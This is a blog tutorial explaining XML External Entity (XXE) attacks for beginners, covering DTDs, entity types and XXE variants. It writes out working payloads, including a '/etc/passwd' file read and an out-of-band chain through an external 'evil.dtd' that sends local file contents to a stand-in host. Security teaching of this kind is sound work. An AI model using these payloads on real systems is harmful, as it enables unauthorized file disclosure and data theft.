Ranjith Ashok

XXE-XML External Entities Attacks

XML External Entities (XXE) is a critical vulnerability that continues to pose a significant threat to web applications. By exploiting the power of XML, adversaries can manipulate entities, access system files, and even execute remote code. In this article, we delve into XXE, unraveling its intricacies through a beginner-friendly approach.

Let's start with the basics.

What is XML?

XML stands for eXtensible Markup Language. Like HTML, it is a text-based markup language with a very simple syntax, but the two have different goals: HTML is focused on presenting data, while XML is used for storing and transmitting it.

Basic XML template

<?xml version="1.0"?> <!-- Metadata information -->

<Data> <!-- Root element -->
    <Subcategory1>Sample1</Subcategory1>
    <Subcategory2>Sample2</Subcategory2>
    <Subcategory3>Sample3</Subcategory3>
</Data>

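
To see how a program reads such a document, here is a minimal sketch using Python's standard-library xml.etree.ElementTree module. The choice of Python and the variable names are assumptions made for illustration; only the element names come from the template above.

```python
import xml.etree.ElementTree as ET

# The basic template from above, written with straight quotes.
xml_text = """<?xml version="1.0"?>
<Data>
    <Subcategory1>Sample1</Subcategory1>
    <Subcategory2>Sample2</Subcategory2>
    <Subcategory3>Sample3</Subcategory3>
</Data>"""

root = ET.fromstring(xml_text)

# Collect each child element's tag and text into a dictionary.
values = {child.tag: child.text for child in root}

print(root.tag)
print(values)
```

The root element and its children come back as ordinary Python objects, which is why XML is convenient for passing data between systems.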

The exact layout may vary slightly from one document to another, but the overall structure stays the same. XML does not allow certain special characters, such as "<" and "&", to appear directly in the data, because the parser could not tell whether they belong to the actual information or to the syntax. This is where "Entities" come into the picture.

What are Entities?

You can think of "Entities" as a container or a variable that holds a certain value and can be used in different parts of the XML. These "Entities" are defined in a separate section in the XML file called Document Type Definition (DTD). These entities can not only store the values specified by the user, but they can also pull values from a local file and even pull data from the internet and store it for later use.

Given below is an example of XML using a DTD.

<?xml version="1.0"?> <!-- Metadata information -->

<!DOCTYPE Data [
    <!ENTITY sample "Sample1">
]>

<Data> <!-- Root element -->
    <Subcategory1>&sample;</Subcategory1>
    <Subcategory2>Sample2</Subcategory2>
    <Subcategory3>Sample3</Subcategory3>
</Data>

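
As a small sketch of what the parser does with such an entity, the snippet below feeds the same document to Python's standard-library ElementTree. The Python wrapper and variable names are assumptions for illustration; the XML is the example above.

```python
import xml.etree.ElementTree as ET

xml_text = """<?xml version="1.0"?>
<!DOCTYPE Data [
    <!ENTITY sample "Sample1">
]>
<Data>
    <Subcategory1>&sample;</Subcategory1>
    <Subcategory2>Sample2</Subcategory2>
    <Subcategory3>Sample3</Subcategory3>
</Data>"""

root = ET.fromstring(xml_text)

# The parser replaces the reference &sample; with the value declared in the DTD.
expanded = root.findtext("Subcategory1")
print(expanded)  # Sample1
```

The application never sees the text "&sample;". It only receives the expanded value, which is exactly what makes entities interesting from an attacker's point of view.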

The following is an example of entities being used to store data from external files.

<?xml version="1.0"?> <!-- Metadata information -->

<!DOCTYPE Data [
    <!ENTITY sample SYSTEM "/usr/share/secret.txt">
]>

<Data> <!-- Root element -->
    <Subcategory1>&sample;</Subcategory1>
</Data>

In the above example, the contents of the secret.txt file are stored in "sample". The "SYSTEM" keyword tells the parser that the entity's value must be fetched from an external source, and the string that follows it is the reference to that source.
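
Whether the file is actually read depends on the parser and how it is configured. As a hedged illustration, Python's standard-library ElementTree does not resolve external entities, so the same document is expected to be rejected there, while other parsers may happily fetch the file. The helper name parse_subcategory is hypothetical.

```python
import xml.etree.ElementTree as ET

xml_text = """<?xml version="1.0"?>
<!DOCTYPE Data [
    <!ENTITY sample SYSTEM "/usr/share/secret.txt">
]>
<Data>
    <Subcategory1>&sample;</Subcategory1>
</Data>"""

def parse_subcategory(text):
    """Return the text of Subcategory1, or a message if the parser refuses."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return f"rejected: {exc}"
    return root.findtext("Subcategory1")

result = parse_subcategory(xml_text)
print(result)
```

A parser that does resolve the entity would return the file contents here instead, and that difference in behavior is the root of XXE.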

Types of Entities:

  • General Entities: General entities are simple entities that reference a value defined somewhere else, as in the examples above. They are referenced as &name;.
  • Parameter Entities: These are entities declared with a "%" that can only be referenced inside the DTD, as %name;. Their value can itself contain markup, such as another entity declaration.

    <!ENTITY % outer "<!ENTITY inner 'Sample1'>">

    These are mainly used to exploit XXE.

  • Predefined Entities: These are a set of predefined values for special characters that might break the document if used directly.

    <hello>H<llo</hello> This is an illegal usage of "<"; this will break the document.

    <hello>H&lt;llo</hello> This is the valid usage, where &lt; is the predefined entity for "<". The character reference &#x3C;, which uses the hex value of "<", works as well.
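
The effect of escaping special characters can be checked with a short sketch like the following, which uses Python's standard library. The helper name parse_text is hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

def parse_text(xml_text):
    """Return the root element's text, or None if the XML is not well-formed."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError:
        return None

raw = parse_text("<hello>H<llo</hello>")           # bare "<" inside the data
named = parse_text("<hello>H&lt;llo</hello>")      # predefined entity
numeric = parse_text("<hello>H&#x3C;llo</hello>")  # hex character reference

print(raw, named, numeric)

# escape() replaces &, < and > with their predefined entities.
escaped = escape("H<llo & more")
print(escaped)
```

The unescaped document fails to parse, while both escaped forms give back the original text with the "<" intact.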

What is XXE?

If a website accepts XML input and its parser resolves entities that we define, so that we are able to access system files, then the site has an XML External Entities (XXE) vulnerability. This vulnerability can be used to read the contents of local files and, in some cases, can even lead to remote code execution.

Types of XXE:

  • In-band XXE: In an In-band XXE, the contents of the file or asset that we are trying to access are visible to us in clear text. It is a direct win.
  • Error-Based XXE: In Error-Based XXE, the only output is a set of error messages. These messages leak some information, and the attacker proceeds based on it.
  • Out-of-Band (OOB) XXE: This is a fully blind XXE where no output of any kind is returned.

More about DTDs and XXE-based attacks:

Previously, we discussed that entities can store values defined by the user as well as contents from external files and URLs. A document can also pull in its declarations from a separate, external DTD.

<!DOCTYPE Var SYSTEM "external.dtd">

So what is the advantage of being able to use external DTDs when we can internally define the DTDs ourselves?

Using an external DTD allows us to reference parameter entities inside the declaration of another entity.

Let us better understand this using an example.

<?xml version="1.0"?>

<!DOCTYPE Function [
    <!ENTITY % parameter_entity "<!ENTITY general_entity 'XML Document'>">
    %parameter_entity;
]>

<Function>&general_entity;</Function>

Parameter entities are only allowed inside the DTD. Once the parameter entity reference is expanded, the above code translates to the following.

<?xml version="1.0"?>

<!DOCTYPE Function [
    <!ENTITY % parameter_entity "<!ENTITY general_entity 'XML Document'>">
    <!ENTITY general_entity 'XML Document'>
]>

<Function>&general_entity;</Function>
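
This expansion can be observed with a small sketch using Python's standard-library expat binding. It assumes that parameter entity processing is off by default in that binding, so the snippet switches it on explicitly; the variable names are illustrative only.

```python
from xml.parsers import expat

xml_text = """<?xml version="1.0"?>
<!DOCTYPE Function [
    <!ENTITY % parameter_entity "<!ENTITY general_entity 'XML Document'>">
    %parameter_entity;
]>
<Function>&general_entity;</Function>"""

chunks = []

parser = expat.ParserCreate()
# Assumption: parameter entities are not processed unless explicitly enabled.
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
# Collect every piece of character data reported for the document body.
parser.CharacterDataHandler = chunks.append
parser.Parse(xml_text, True)

text = "".join(chunks)
print(text)
```

If the parameter entity is expanded as described, the general entity it declares becomes available and its value shows up as the text of the Function element.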

Now we can access the general entity. Next, let us try the same technique to send the contents of a local file to a remote server.

<?xml version="1.0"?>

<!DOCTYPE Function [
    <!ENTITY % file_content SYSTEM "/usr/share/Test.txt">
    <!ENTITY % reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file_content;'>">
    %reference;
]>

<Function>&send;</Function>

From the previous example, we would expect the above code to translate to

<?xml version="1.0"?>

<!DOCTYPE Function [
    <!ENTITY % reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file_content;'>">
    <!ENTITY send SYSTEM 'https://randomsite.com/?[contents of Test.txt]'>
]>

<Function>&send;</Function>

Now you might think that this is a perfectly valid approach to getting the contents of any file, but the parser will throw an error when this document is parsed. This is because, in an internal DTD, a parameter entity (here, the one holding the file contents) can only be referenced between declarations, at the top level of the DTD. It cannot be referenced inside another entity declaration, as in the code above.
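
As a hedged check of this restriction, the sketch below hands such a document to Python's standard-library ElementTree and records the error. The entity names are illustrative. The parser stops while reading the DTD, so no file is read and no request is sent.

```python
import xml.etree.ElementTree as ET

xml_text = """<?xml version="1.0"?>
<!DOCTYPE Function [
    <!ENTITY % file_content SYSTEM "/usr/share/Test.txt">
    <!ENTITY % reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file_content;'>">
    %reference;
]>
<Function>&send;</Function>"""

try:
    ET.fromstring(xml_text)
    error = None
except ET.ParseError as exc:
    # The exact wording depends on the underlying expat version; it is
    # expected to complain about an illegal parameter entity reference.
    error = str(exc)

print(error)
```

The document is refused outright, which is why the payload has to be moved somewhere the restriction does not apply.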

So how do we get around this? How can a parameter entity be referenced inside another entity declaration?

This is where external DTDs come into play. The same rule does not apply to external DTDs.

Look at the following example.

<?xml version="1.0"?>

<!DOCTYPE data SYSTEM 'https://randomsite.com/evil.dtd'>

<data>&send;</data>

You might be wondering, where is the send entity? Let this be the contents of evil.dtd.

    <!ENTITY % file_content SYSTEM "/usr/share/Test.txt">
    <!ENTITY % reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file_content;'>">
    %reference;

Because evil.dtd is an external DTD, a parameter entity may be referenced inside another entity declaration there, so the expansion that we expected before now happens without any problems.

If you change the entity's file path to a URL and the server that parses your uploaded XML successfully connects to that URL, then you are practically making requests as the server. This is another vulnerability, called Server-Side Request Forgery (SSRF).

Exploiting XXE:

We have discussed that Entities and DTDs are the weaker links in XML that facilitate its exploitation.

Let’s see a basic XML payload.

<?xml version="1.0"?>

<!DOCTYPE data [
    <!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>

<data>&xxe;</data>

Here the contents of the file "passwd" are stored in the entity xxe, which is then referenced inside the <data> element.

I suggest you go through this amazing video by Pwnfunction in collaboration with John Hammond for a much deeper understanding of XXE.


You can also check out the swisskyrepo/PayloadsAllTheThings repository on GitHub, a list of useful payloads and bypasses for web application security and pentest/CTF, which has some really useful payloads for XXE.

In conclusion, XML External Entities (XXE) remain a significant threat to web applications, making it a top concern in the world of cybersecurity. I have only scratched the surface with this blog and would highly recommend getting hands-on to better understand the concepts discussed here.

Thank you for joining me on this journey. Will catch you in the next blog.

Happy Hacking!
